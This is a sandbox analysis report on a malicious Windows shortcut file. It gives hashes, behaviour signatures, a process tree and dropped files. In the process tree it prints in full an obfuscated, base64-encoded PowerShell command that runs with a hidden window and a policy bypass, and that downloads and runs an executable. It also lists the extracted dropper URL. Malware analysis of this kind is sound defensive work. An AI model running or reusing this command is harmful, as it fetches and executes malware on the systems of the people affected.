Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    94s
  • max time network
    97s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/09/2024, 10:05

General

  • Target

    fc1006824cb66d17c68f1ffa53b37c4b_JaffaCakes118.lnk

  • Size

    3KB

  • MD5

    fc1006824cb66d17c68f1ffa53b37c4b

  • SHA1

    c54b745011bccb3d068ba74a4e543cb2de1043a4

  • SHA256

    95ca946aef501e5114c26cb6ef895dbc29761b4f7d6bbccc22e4bfbde1be6759

  • SHA512

    1d14c5b3058c994cf542807a4341510453fda81ea9a67cfc5038b2f8fc5e80fca3271c44a9c937d2366a140e197ec605bf280a18278cae6886fa939fb28053c0

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://drive.google.com/uc?export=download&id=0B3AM8u080I_Pb2I2dXdkaUxHWm8

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

    Windows that would typically be displayed when an application carries out an operation can be hidden.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\fc1006824cb66d17c68f1ffa53b37c4b_JaffaCakes118.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3672
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cMD /c PowERShelL.ExE -eXEcUtiOnPoLIcy byPass -WIndowSTyLE HIddeN -ENCoDeDcOMMaNd IAAoAE4AZQB3AC0ATwBCAEoARQBjAHQAIABTAFkAcwBUAEUATQAuAG4ARQBUAC4AVwBFAEIAYwBMAGkAZQBOAFQAKQAuAGQAbwB3AG4AbABvAGEAZABmAGkAbABFACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AZQB4AHAAbwByAHQAPQBkAG8AdwBuAGwAbwBhAGQAJgBpAGQAPQAwAEIAMwBBAE0AOAB1ADAAOAAwAEkAXwBQAGIAMgBJADIAZABYAGQAawBhAFUAeABIAFcAbQA4AB0gIAAsACAAHSAkAEUAbgB2ADoAYQBwAHAAZABBAHQAYQBcAHYAdgByAGUAYQBkAGUAcwB4AHQALgBlAHgAZQAdICAAKQAgADsAIABpAG4AdgBvAEsARQAtAEkAdABlAG0AIAAdICQAZQBuAHYAOgBhAHAAUABkAGEAVABhAFwAdgB2AHIAZQBhAGQAZQBzAHgAdAAuAGUAeABlAB0g
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3096
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c PowERShelL.ExE -eXEcUtiOnPoLIcy byPass -WIndowSTyLE HIddeN -ENCoDeDcOMMaNd IAAoAE4AZQB3AC0ATwBCAEoARQBjAHQAIABTAFkAcwBUAEUATQAuAG4ARQBUAC4AVwBFAEIAYwBMAGkAZQBOAFQAKQAuAGQAbwB3AG4AbABvAGEAZABmAGkAbABFACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AZQB4AHAAbwByAHQAPQBkAG8AdwBuAGwAbwBhAGQAJgBpAGQAPQAwAEIAMwBBAE0AOAB1ADAAOAAwAEkAXwBQAGIAMgBJADIAZABYAGQAawBhAFUAeABIAFcAbQA4AB0gIAAsACAAHSAkAEUAbgB2ADoAYQBwAHAAZABBAHQAYQBcAHYAdgByAGUAYQBkAGUAcwB4AHQALgBlAHgAZQAdICAAKQAgADsAIABpAG4AdgBvAEsARQAtAEkAdABlAG0AIAAdICQAZQBuAHYAOgBhAHAAUABkAGEAVABhAFwAdgB2AHIAZQBhAGQAZQBzAHgAdAAuAGUAeABlAB0g
        3⤵
        • Hide Artifacts: Hidden Window
        • Suspicious use of WriteProcessMemory
        PID:2008
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          PowERShelL.ExE -eXEcUtiOnPoLIcy byPass -WIndowSTyLE HIddeN -ENCoDeDcOMMaNd IAAoAE4AZQB3AC0ATwBCAEoARQBjAHQAIABTAFkAcwBUAEUATQAuAG4ARQBUAC4AVwBFAEIAYwBMAGkAZQBOAFQAKQAuAGQAbwB3AG4AbABvAGEAZABmAGkAbABFACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AZQB4AHAAbwByAHQAPQBkAG8AdwBuAGwAbwBhAGQAJgBpAGQAPQAwAEIAMwBBAE0AOAB1ADAAOAAwAEkAXwBQAGIAMgBJADIAZABYAGQAawBhAFUAeABIAFcAbQA4AB0gIAAsACAAHSAkAEUAbgB2ADoAYQBwAHAAZABBAHQAYQBcAHYAdgByAGUAYQBkAGUAcwB4AHQALgBlAHgAZQAdICAAKQAgADsAIABpAG4AdgBvAEsARQAtAEkAdABlAG0AIAAdICQAZQBuAHYAOgBhAHAAUABkAGEAVABhAFwAdgB2AHIAZQBhAGQAZQBzAHgAdAAuAGUAeABlAB0g
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4760

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    bb925cc5c32a817b61b5a68f00475ac2

    SHA1

    368bbcd93d46036334f385fe80a6315130a873f4

    SHA256

    cab89442f228f263a88d3db648093b2389fa2676ee3f95fccdd7c9574a8e1c11

    SHA512

    69688f4277b0dfdeca560166776ecc74ae2933d6808e849ac60e0eb2310333d37e6216edb23737459a0e2395594a1cd579bccd008499e08526393d96315b4634

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    64B

    MD5

    5caad758326454b5788ec35315c4c304

    SHA1

    3aef8dba8042662a7fcf97e51047dc636b4d4724

    SHA256

    83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

    SHA512

    4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vabcc1bf.hhq.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/3096-2-0x00007FFDAEC63000-0x00007FFDAEC65000-memory.dmp

    Filesize

    8KB

  • memory/3096-8-0x000001D166F30000-0x000001D166F52000-memory.dmp

    Filesize

    136KB

  • memory/3096-13-0x00007FFDAEC60000-0x00007FFDAF721000-memory.dmp

    Filesize

    10.8MB

  • memory/3096-14-0x00007FFDAEC60000-0x00007FFDAF721000-memory.dmp

    Filesize

    10.8MB

  • memory/3096-29-0x00007FFDAEC60000-0x00007FFDAF721000-memory.dmp

    Filesize

    10.8MB